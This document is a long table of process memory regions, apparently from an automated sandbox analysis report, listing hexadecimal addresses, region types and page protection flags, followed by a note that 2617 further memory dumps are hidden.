21A20221000
|
unkown
|
page read and write
|
||
|
7FF52D188000
|
unkown
|
page readonly
|
||
|
1DDAECD5000
|
heap
|
page read and write
|
||
|
7FF52CDF0000
|
unkown
|
page readonly
|
||
|
7FF5135F6000
|
unkown
|
page readonly
|
||
|
2295CF02000
|
unkown
|
page read and write
|
||
|
24D9FD40000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
EDEC4FF000
|
stack
|
page read and write
|
||
|
7FF5A9377000
|
unkown
|
page readonly
|
||
|
27B07E0B000
|
unkown
|
page read and write
|
||
|
27618E3A000
|
heap
|
page read and write
|
||
|
2BAAE8BF000
|
unkown
|
page read and write
|
||
|
D01BD4B000
|
unkown
|
page read and write
|
||
|
1DDB0C10000
|
heap
|
page read and write
|
||
|
26A88414000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
2BAAEB43000
|
unkown
|
page read and write
|
||
|
2BAAAC0E000
|
unkown
|
page read and write
|
||
|
26A87D80000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
8230000
|
heap
|
page read and write
|
||
|
1DDAEBA0000
|
trusted library allocation
|
page read and write
|
||
|
1DDAE9EE000
|
heap
|
page read and write
|
||
|
7DF4869B1000
|
unkown
|
page execute read
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
EDEC67F000
|
stack
|
page read and write
|
||
|
26A87E51000
|
heap
|
page read and write
|
||
|
1DDB0A77000
|
heap
|
page read and write
|
||
|
7FF582C17000
|
unkown
|
page readonly
|
||
|
7453000
|
unkown
|
page read and write
|
||
|
17953770000
|
unkown
|
page execute and read and write
|
||
|
2BAAD140000
|
unkown
|
page read and write
|
||
|
27618E6B000
|
heap
|
page read and write
|
||
|
202C0600000
|
unkown
|
page readonly
|
||
|
7FF5123A5000
|
unkown
|
page readonly
|
||
|
7FF5814A7000
|
unkown
|
page readonly
|
||
|
7FFD9B861000
|
trusted library allocation
|
page read and write
|
||
|
7FF5122EB000
|
unkown
|
page readonly
|
||
|
27618860000
|
heap
|
page read and write
|
||
|
1386E220000
|
heap
|
page read and write
|
||
|
27B00087000
|
unkown
|
page read and write
|
||
|
1386E0B4000
|
heap
|
page read and write
|
||
|
2BAAC5AE000
|
unkown
|
page read and write
|
||
|
1DDAEA50000
|
heap
|
page read and write
|
||
|
7211F8E000
|
unkown
|
page readonly
|
||
|
7FF565FEC000
|
unkown
|
page readonly
|
||
|
E2BE67B000
|
stack
|
page read and write
|
||
|
13801A92000
|
trusted library allocation
|
page read and write
|
||
|
1DDAF1ED000
|
heap
|
page read and write
|
||
|
26A88417000
|
heap
|
page read and write
|
||
|
72126FE000
|
unkown
|
page readonly
|
||
|
7FF5123D1000
|
unkown
|
page readonly
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
F25AF7E000
|
stack
|
page read and write
|
||
|
2BAACA10000
|
unkown
|
page read and write
|
||
|
2BAAC720000
|
unkown
|
page readonly
|
||
|
28728CFB000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
202C03D7000
|
unkown
|
page read and write
|
||
|
2BAADCB0000
|
unkown
|
page readonly
|
||
|
5A91000
|
unkown
|
page read and write
|
||
|
7DFE21ABD000
|
unkown
|
page readonly
|
||
|
287293D5000
|
heap
|
page read and write
|
||
|
1DDAED45000
|
heap
|
page read and write
|
||
|
1E084F3F000
|
heap
|
page read and write
|
||
|
FC84A7E000
|
stack
|
page read and write
|
||
|
2BAB2FB0000
|
unkown
|
page readonly
|
||
|
2295CE40000
|
unkown
|
page read and write
|
||
|
20410F8B000
|
heap
|
page read and write
|
||
|
28728C60000
|
heap
|
page read and write
|
||
|
208442D0000
|
unkown
|
page execute and read and write
|
||
|
8B38C7E000
|
stack
|
page read and write
|
||
|
1E084F02000
|
heap
|
page read and write
|
||
|
2BAA7970000
|
unkown
|
page read and write
|
||
|
2295CE78000
|
unkown
|
page read and write
|
||
|
7FF581331000
|
unkown
|
page readonly
|
||
|
2BAAE59B000
|
unkown
|
page read and write
|
||
|
2872ACC7000
|
heap
|
page read and write
|
||
|
1C8DBF5D000
|
heap
|
page read and write
|
||
|
1E086E50000
|
heap
|
page read and write
|
||
|
20410FC1000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF52D00A000
|
unkown
|
page readonly
|
||
|
287293C9000
|
heap
|
page read and write
|
||
|
26A871C0000
|
unkown
|
page readonly
|
||
|
26A8842E000
|
heap
|
page read and write
|
||
|
A9259FE000
|
unkown
|
page read and write
|
||
|
1DDAE9E5000
|
heap
|
page read and write
|
||
|
27618E5C000
|
heap
|
page read and write
|
||
|
2BAAE16D000
|
unkown
|
page read and write
|
||
|
22D862F0000
|
heap
|
page read and write
|
||
|
2D0D4BB0000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF513546000
|
unkown
|
page readonly
|
||
|
26A88427000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAEA08000
|
heap
|
page read and write
|
||
|
76D0000
|
unkown
|
page read and write
|
||
|
2BAAD34B000
|
unkown
|
page read and write
|
||
|
20412FF0000
|
heap
|
page read and write
|
||
|
20411789000
|
heap
|
page read and write
|
||
|
7442000
|
unkown
|
page read and write
|
||
|
26A88459000
|
heap
|
page read and write
|
||
|
27618790000
|
heap
|
page read and write
|
||
|
21A1F6A3000
|
heap
|
page read and write
|
||
|
225DC610000
|
unkown
|
page execute and read and write
|
||
|
202BFC6E000
|
unkown
|
page read and write
|
||
|
7FFDE21F0000
|
unkown
|
page execute read
|
||
|
2D0D5147000
|
heap
|
page read and write
|
||
|
7FF5812B0000
|
unkown
|
page readonly
|
||
|
2BAAC61C000
|
unkown
|
page read and write
|
||
|
2BAAE3A0000
|
unkown
|
page read and write
|
||
|
20411207000
|
heap
|
page read and write
|
||
|
2BAAE589000
|
unkown
|
page read and write
|
||
|
20410FA9000
|
heap
|
page read and write
|
||
|
138018EE000
|
trusted library allocation
|
page read and write
|
||
|
225DC375000
|
heap
|
page read and write
|
||
|
27618868000
|
heap
|
page read and write
|
||
|
2295CE21000
|
unkown
|
page read and write
|
||
|
28728CCA000
|
heap
|
page read and write
|
||
|
1DDAEA0D000
|
heap
|
page read and write
|
||
|
7FF5122E8000
|
unkown
|
page readonly
|
||
|
2BAAD35A000
|
unkown
|
page read and write
|
||
|
225DCB19000
|
unkown
|
page read and write
|
||
|
27618E3B000
|
heap
|
page read and write
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
2BAADCF0000
|
unkown
|
page readonly
|
||
|
13810086000
|
trusted library allocation
|
page read and write
|
||
|
1F2ECFE000
|
unkown
|
page read and write
|
||
|
7FF5814D6000
|
unkown
|
page readonly
|
||
|
7E007363F000
|
unkown
|
page readonly
|
||
|
202C0478000
|
unkown
|
page read and write
|
||
|
1C8DBD60000
|
heap
|
page read and write
|
||
|
26A88437000
|
heap
|
page read and write
|
||
|
2BAAD339000
|
unkown
|
page read and write
|
||
|
1F2ED7E000
|
stack
|
page read and write
|
||
|
1E085467000
|
heap
|
page read and write
|
||
|
2FBE000
|
heap
|
page read and write
|
||
|
26A89CC1000
|
heap
|
page read and write
|
||
|
17953000000
|
unkown
|
page read and write
|
||
|
13801290000
|
trusted library allocation
|
page read and write
|
||
|
1C8DBF5F000
|
heap
|
page read and write
|
||
|
17953681000
|
unkown
|
page readonly
|
||
|
2BAACB91000
|
unkown
|
page read and write
|
||
|
1E084F4D000
|
heap
|
page read and write
|
||
|
24D9FFA0000
|
direct allocation
|
page readonly
|
||
|
1DDB0A70000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAEBA0000
|
trusted library allocation
|
page read and write
|
||
|
28728CB3000
|
heap
|
page read and write
|
||
|
1E085460000
|
heap
|
page read and write
|
||
|
1E08508D000
|
heap
|
page read and write
|
||
|
2BAAC7CF000
|
unkown
|
page read and write
|
||
|
7FF52CDEB000
|
unkown
|
page readonly
|
||
|
2BAA950E000
|
unkown
|
page read and write
|
||
|
2C90000
|
unkown
|
page read and write
|
||
|
1E084F48000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
28728CB3000
|
heap
|
page read and write
|
||
|
48FE000
|
unkown
|
page read and write
|
||
|
1DDB0A75000
|
heap
|
page read and write
|
||
|
2BAA7900000
|
unkown
|
page readonly
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
|
28728EB2000
|
heap
|
page read and write
|
||
|
2BAAE2E0000
|
unkown
|
page read and write
|
||
|
2BAAACA1000
|
unkown
|
page read and write
|
||
|
2BAAC578000
|
unkown
|
page read and write
|
||
|
20413004000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1C8DC1E0000
|
heap
|
page read and write
|
||
|
7FF581278000
|
unkown
|
page readonly
|
||
|
7DF4F62B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BAAC638000
|
unkown
|
page read and write
|
||
|
1A610200000
|
heap
|
page read and write
|
||
|
7212C7E000
|
stack
|
page read and write
|
||
|
2BAAC9A8000
|
unkown
|
page read and write
|
||
|
4B8E000
|
unkown
|
page read and write
|
||
|
17952F60000
|
unkown
|
page readonly
|
||
|
2BAAE5A7000
|
unkown
|
page read and write
|
||
|
A9256F8000
|
unkown
|
page read and write
|
||
|
202C0B10000
|
unkown
|
page readonly
|
||
|
8C9AAFD000
|
stack
|
page read and write
|
||
|
202C0466000
|
unkown
|
page read and write
|
||
|
26A88430000
|
heap
|
page read and write
|
||
|
1C8F61B0000
|
heap
|
page read and write
|
||
|
27B0820B000
|
unkown
|
page read and write
|
||
|
72125FE000
|
unkown
|
page readonly
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
138019C4000
|
trusted library allocation
|
page read and write
|
||
|
7670000
|
unkown
|
page execute and read and write
|
||
|
1DDAEA12000
|
heap
|
page read and write
|
||
|
1DDAEA10000
|
heap
|
page read and write
|
||
|
2BAAD4EE000
|
unkown
|
page read and write
|
||
|
2D0D4BC0000
|
heap
|
page readonly
|
||
|
7FFD9BA04000
|
trusted library allocation
|
page read and write
|
||
|
7FF58145F000
|
unkown
|
page readonly
|
||
|
2BAAAD34000
|
unkown
|
page read and write
|
||
|
7FF52D11D000
|
unkown
|
page readonly
|
||
|
1DDAEA04000
|
heap
|
page read and write
|
||
|
1DDB0A7E000
|
heap
|
page read and write
|
||
|
7FF52D159000
|
unkown
|
page readonly
|
||
|
1E086E64000
|
heap
|
page read and write
|
||
|
7FF512499000
|
unkown
|
page readonly
|
||
|
704E000
|
unkown
|
page read and write
|
||
|
7FF5504B8000
|
unkown
|
page readonly
|
||
|
26A87D50000
|
heap
|
page read and write
|
||
|
1DDAF1F9000
|
heap
|
page read and write
|
||
|
7FF5812A4000
|
unkown
|
page readonly
|
||
|
27618E47000
|
heap
|
page read and write
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
26A88459000
|
heap
|
page read and write
|
||
|
2BAAD130000
|
unkown
|
page readonly
|
||
|
276188E5000
|
heap
|
page read and write
|
||
|
2BAACA8C000
|
unkown
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
2BAA9560000
|
unkown
|
page read and write
|
||
|
2EA4000
|
unkown
|
page read and write
|
||
|
7FF582B09000
|
unkown
|
page readonly
|
||
|
2BAACAB4000
|
unkown
|
page read and write
|
||
|
1A6102A0000
|
heap
|
page read and write
|
||
|
7FF550482000
|
unkown
|
page readonly
|
||
|
2BAAE3DA000
|
unkown
|
page read and write
|
||
|
1E084EF8000
|
heap
|
page read and write
|
||
|
138701B9000
|
heap
|
page read and write
|
||
|
27618E54000
|
heap
|
page read and write
|
||
|
28728CBC000
|
heap
|
page read and write
|
||
|
27618E79000
|
heap
|
page read and write
|
||
|
7FF5813AA000
|
unkown
|
page readonly
|
||
|
F25AB7F000
|
stack
|
page read and write
|
||
|
7FF5504F7000
|
unkown
|
page readonly
|
||
|
2BAAED9E000
|
unkown
|
page read and write
|
||
|
2BAAC568000
|
unkown
|
page read and write
|
||
|
2BAACB5C000
|
unkown
|
page read and write
|
||
|
7FF58276E000
|
unkown
|
page readonly
|
||
|
2EA0000
|
unkown
|
page read and write
|
||
|
1C8EDAF9000
|
trusted library allocation
|
page read and write
|
||
|
2BAA7BF0000
|
unkown
|
page readonly
|
||
|
684C397000
|
stack
|
page read and write
|
||
|
1C8DBED0000
|
trusted library allocation
|
page read and write
|
||
|
1E084F4C000
|
heap
|
page read and write
|
||
|
7FF513552000
|
unkown
|
page readonly
|
||
|
1DDAECD4000
|
heap
|
page read and write
|
||
|
1E08508B000
|
heap
|
page read and write
|
||
|
1E0855C4000
|
heap
|
page read and write
|
||
|
76C0000
|
unkown
|
page read and write
|
||
|
22D86010000
|
heap
|
page read and write
|
||
|
2295CCC0000
|
unkown
|
page readonly
|
||
|
2BAAD540000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1F2F079000
|
stack
|
page read and write
|
||
|
20410EE0000
|
heap
|
page read and write
|
||
|
2BAAC7CC000
|
unkown
|
page read and write
|
||
|
2BAA7CA0000
|
unkown
|
page readonly
|
||
|
7FF52D14C000
|
unkown
|
page readonly
|
||
|
1E084F8A000
|
heap
|
page read and write
|
||
|
23ED95C0000
|
heap
|
page read and write
|
||
|
27B0232E000
|
unkown
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
27618E73000
|
heap
|
page read and write
|
||
|
20410F00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E3000
|
trusted library allocation
|
page read and write
|
||
|
7FF5813D5000
|
unkown
|
page readonly
|
||
|
7FF5A94BE000
|
unkown
|
page readonly
|
||
|
20411203000
|
heap
|
page read and write
|
||
|
1A6102AC000
|
heap
|
page read and write
|
||
|
24D9FF90000
|
direct allocation
|
page read and write
|
||
|
27618895000
|
heap
|
page read and write
|
||
|
2BAAED50000
|
unkown
|
page readonly
|
||
|
2BAAD780000
|
unkown
|
page read and write
|
||
|
26A88430000
|
heap
|
page read and write
|
||
|
7690000
|
heap
|
page read and write
|
||
|
26A87E8A000
|
heap
|
page read and write
|
||
|
7FFD9B6D2000
|
trusted library allocation
|
page read and write
|
||
|
276188B1000
|
heap
|
page read and write
|
||
|
20410F69000
|
heap
|
page read and write
|
||
|
7660000
|
unkown
|
page read and write
|
||
|
20410F84000
|
heap
|
page read and write
|
||
|
2A66063E000
|
unkown
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FF58146B000
|
unkown
|
page readonly
|
||
|
2761A6F4000
|
heap
|
page read and write
|
||
|
D01ABFE000
|
unkown
|
page read and write
|
||
|
276188B1000
|
heap
|
page read and write
|
||
|
13800FA3000
|
trusted library allocation
|
page read and write
|
||
|
1380171A000
|
trusted library allocation
|
page read and write
|
||
|
276188C7000
|
heap
|
page read and write
|
||
|
20410F86000
|
heap
|
page read and write
|
||
|
1DDB0A7E000
|
heap
|
page read and write
|
||
|
2BAAD741000
|
unkown
|
page read and write
|
||
|
1C8EE6C5000
|
trusted library allocation
|
page read and write
|
||
|
2A660656000
|
unkown
|
page read and write
|
||
|
7FF582621000
|
unkown
|
page readonly
|
||
|
20410F82000
|
heap
|
page read and write
|
||
|
26A89CC4000
|
heap
|
page read and write
|
||
|
2D0D49A0000
|
heap
|
page read and write
|
||
|
4AC0000
|
unkown
|
page read and write
|
||
|
2A660A13000
|
unkown
|
page read and write
|
||
|
1380178F000
|
trusted library allocation
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1F2EE7A000
|
stack
|
page read and write
|
||
|
7212A79000
|
stack
|
page read and write
|
||
|
26A87E5F000
|
heap
|
page read and write
|
||
|
2BAAD170000
|
unkown
|
page readonly
|
||
|
138016BD000
|
trusted library allocation
|
page read and write
|
||
|
225DC370000
|
heap
|
page read and write
|
||
|
1E085463000
|
heap
|
page read and write
|
||
|
7DF486A30000
|
unkown
|
page readonly
|
||
|
7FF5124A0000
|
unkown
|
page readonly
|
||
|
27618E40000
|
heap
|
page read and write
|
||
|
7FF582C01000
|
unkown
|
page readonly
|
||
|
1F2FF0C000
|
stack
|
page read and write
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
2BAAC534000
|
unkown
|
page read and write
|
||
|
2BAACB0E000
|
unkown
|
page read and write
|
||
|
D01AB7E000
|
unkown
|
page read and write
|
||
|
7DF4F62A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C5F6DFE000
|
unkown
|
page readonly
|
||
|
7FFD9B780000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BAAD190000
|
unkown
|
page read and write
|
||
|
4C9FFE000
|
stack
|
page read and write
|
||
|
1386FBC5000
|
heap
|
page read and write
|
||
|
26A88448000
|
heap
|
page read and write
|
||
|
D01AC7D000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
4CABFE000
|
stack
|
page read and write
|
||
|
7FF581334000
|
unkown
|
page readonly
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
1C8DBFA9000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
7FFD9B6C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A660662000
|
unkown
|
page read and write
|
||
|
202BFB50000
|
heap
|
page read and write
|
||
|
26A87240000
|
unkown
|
page read and write
|
||
|
4A80000
|
heap
|
page execute and read and write
|
||
|
28728CA2000
|
heap
|
page read and write
|
||
|
2D0D4B90000
|
trusted library allocation
|
page read and write
|
||
|
1C8DBE80000
|
heap
|
page read and write
|
||
|
27B06C36000
|
unkown
|
page read and write
|
||
|
1E0855E4000
|
heap
|
page read and write
|
||
|
20410FC1000
|
heap
|
page read and write
|
||
|
28728CFF000
|
heap
|
page read and write
|
||
|
287293BF000
|
heap
|
page read and write
|
||
|
24D9FF92000
|
direct allocation
|
page readonly
|
||
|
7FF5A94F1000
|
unkown
|
page readonly
|
||
|
1C8DC0E0000
|
heap
|
page read and write
|
||
|
7FF512477000
|
unkown
|
page readonly
|
||
|
2BAAE5A1000
|
unkown
|
page read and write
|
||
|
A925479000
|
unkown
|
page read and write
|
||
|
8160000
|
unkown
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
1DDAED40000
|
heap
|
page read and write
|
||
|
4B51000
|
unkown
|
page read and write
|
||
|
1DDB0A71000
|
heap
|
page read and write
|
||
|
13801282000
|
trusted library allocation
|
page read and write
|
||
|
24DA1B2A000
|
unkown
|
page read and write
|
||
|
2BAAC9F7000
|
unkown
|
page read and write
|
||
|
7FFDE21F0000
|
unkown
|
page execute read
|
||
|
7DF4869E0000
|
unkown
|
page readonly
|
||
|
1E08546B000
|
heap
|
page read and write
|
||
|
20410F84000
|
heap
|
page read and write
|
||
|
C7E8FBE000
|
unkown
|
page readonly
|
||
|
2BAAE58B000
|
unkown
|
page read and write
|
||
|
1386E000000
|
heap
|
page read and write
|
||
|
8B3897E000
|
unkown
|
page read and write
|
||
|
26A87E80000
|
heap
|
page read and write
|
||
|
1DDAEA34000
|
heap
|
page read and write
|
||
|
2BAA7AF0000
|
heap
|
page read and write
|
||
|
7FF581397000
|
unkown
|
page readonly
|
||
|
2BAB05E9000
|
unkown
|
page read and write
|
||
|
2A660676000
|
unkown
|
page read and write
|
||
|
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
|
7FF5504B1000
|
unkown
|
page readonly
|
||
|
C5F6AF8000
|
stack
|
page read and write
|
||
|
C19D9FF000
|
stack
|
page read and write
|
||
|
A92587F000
|
unkown
|
page read and write
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
2BAB2FD2000
|
unkown
|
page readonly
|
||
|
2872ACCE000
|
heap
|
page read and write
|
||
|
2BAAD730000
|
unkown
|
page read and write
|
||
|
202C0459000
|
unkown
|
page read and write
|
||
|
26A87E43000
|
heap
|
page read and write
|
||
|
2BAAE343000
|
unkown
|
page read and write
|
||
|
20410F8E000
|
heap
|
page read and write
|
||
|
2A6612D0000
|
unkown
|
page execute and read and write
|
||
|
FC847FF000
|
stack
|
page read and write
|
||
|
2BAAE59F000
|
unkown
|
page read and write
|
||
|
2BAAAD30000
|
unkown
|
page read and write
|
||
|
1E4E9EC0000
|
heap
|
page read and write
|
||
|
1386FBA7000
|
heap
|
page execute and read and write
|
||
|
1E084F59000
|
heap
|
page read and write
|
||
|
2BAAC61F000
|
unkown
|
page read and write
|
||
|
28728F1B000
|
heap
|
page read and write
|
||
|
7FF5A9580000
|
unkown
|
page readonly
|
||
|
20410FB8000
|
heap
|
page read and write
|
||
|
28728CC8000
|
heap
|
page read and write
|
||
|
2530E9C0000
|
heap
|
page read and write
|
||
|
3F99E7F000
|
stack
|
page read and write
|
||
|
7FF512422000
|
unkown
|
page readonly
|
||
|
2872ACB0000
|
heap
|
page read and write
|
||
|
BC0967E000
|
unkown
|
page readonly
|
||
|
26A87302000
|
unkown
|
page read and write
|
||
|
13810084000
|
trusted library allocation
|
page read and write
|
||
|
20411205000
|
heap
|
page read and write
|
||
|
27618877000
|
heap
|
page read and write
|
||
|
1E4E9EF0000
|
heap
|
page read and write
|
||
|
A9251E4000
|
unkown
|
page read and write
|
||
|
2BAAE2F0000
|
unkown
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
1DDAE9F2000
|
heap
|
page read and write
|
||
|
27B06C0D000
|
unkown
|
page read and write
|
||
|
1386E07A000
|
heap
|
page read and write
|
||
|
7FF5A9586000
|
unkown
|
page readonly
|
||
|
7FF58137A000
|
unkown
|
page readonly
|
||
|
7FFD9B6D4000
|
trusted library allocation
|
page read and write
|
||
|
7FF581436000
|
unkown
|
page readonly
|
||
|
5AB9000
|
unkown
|
page read and write
|
||
|
2E3E000
|
unkown
|
page read and write
|
||
|
27B0720B000
|
unkown
|
page read and write
|
||
|
21A1F6A6000
|
heap
|
page read and write
|
||
|
75EA47F000
|
stack
|
page read and write
|
||
|
2295D530000
|
unkown
|
page execute and read and write
|
||
|
28728EB4000
|
heap
|
page read and write
|
||
|
276188D6000
|
heap
|
page read and write
|
||
|
7FF51241E000
|
unkown
|
page readonly
|
||
|
2BAAC622000
|
unkown
|
page read and write
|
||
|
4ADC000
|
unkown
|
page read and write
|
||
|
26A87E34000
|
heap
|
page read and write
|
||
|
1386E06E000
|
heap
|
page read and write
|
||
|
26A8722B000
|
unkown
|
page read and write
|
||
|
BC0947E000
|
unkown
|
page readonly
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
26A87E5F000
|
heap
|
page read and write
|
||
|
2872ACCE000
|
heap
|
page read and write
|
||
|
1DDAEA25000
|
heap
|
page read and write
|
||
|
276188EA000
|
heap
|
page read and write
|
||
|
7FF5A9579000
|
unkown
|
page readonly
|
||
|
1E084F8C000
|
heap
|
page read and write
|
||
|
202C03CB000
|
unkown
|
page read and write
|
||
|
138018B7000
|
trusted library allocation
|
page read and write
|
||
|
26A8843B000
|
heap
|
page read and write
|
||
|
7FF5135AA000
|
unkown
|
page readonly
|
||
|
2041176E000
|
heap
|
page read and write
|
||
|
2BAAC566000
|
unkown
|
page read and write
|
||
|
2041177C000
|
heap
|
page read and write
|
||
|
26A87D5D000
|
heap
|
page read and write
|
||
|
204112CB000
|
heap
|
page read and write
|
||
|
28728CC7000
|
heap
|
page read and write
|
||
|
21A20221000
|
unkown
|
page read and write
|
||
|
28728CB0000
|
heap
|
page read and write
|
||
|
7DF486A80000
|
unkown
|
page readonly
|
||
|
2BAAE597000
|
unkown
|
page read and write
|
||
|
13810074000
|
trusted library allocation
|
page read and write
|
||
|
1386E225000
|
heap
|
page read and write
|
||
|
7FF52D18D000
|
unkown
|
page readonly
|
||
|
276188EF000
|
heap
|
page read and write
|
||
|
276188C2000
|
heap
|
page read and write
|
||
|
1386E074000
|
heap
|
page read and write
|
||
|
1386FB10000
|
trusted library section
|
page read and write
|
||
|
2BAAE581000
|
unkown
|
page read and write
|
||
|
2BAAE591000
|
unkown
|
page read and write
|
||
|
1386FC00000
|
trusted library allocation
|
page read and write
|
||
|
2BAACA1B000
|
unkown
|
page read and write
|
||
|
2530EBBE000
|
heap
|
page read and write
|
||
|
A9255FE000
|
unkown
|
page read and write
|
||
|
1E084F52000
|
heap
|
page read and write
|
||
|
7FF55049E000
|
unkown
|
page readonly
|
||
|
26A87E60000
|
heap
|
page read and write
|
||
|
7FF5812B6000
|
unkown
|
page readonly
|
||
|
2BAAD173000
|
unkown
|
page readonly
|
||
|
225DC685000
|
unkown
|
page readonly
|
||
|
28728C95000
|
heap
|
page read and write
|
||
|
1DDAECD7000
|
heap
|
page read and write
|
||
|
13800DFE000
|
trusted library allocation
|
page read and write
|
||
|
2EAD000
|
unkown
|
page execute and read and write
|
||
|
26A87990000
|
unkown
|
page execute and read and write
|
||
|
6ED507B000
|
stack
|
page read and write
|
||
|
27618E32000
|
heap
|
page read and write
|
||
|
2BAA7A50000
|
unkown
|
page read and write
|
||
|
2BAACB60000
|
unkown
|
page read and write
|
There are 2617 hidden memdumps, click here to show them.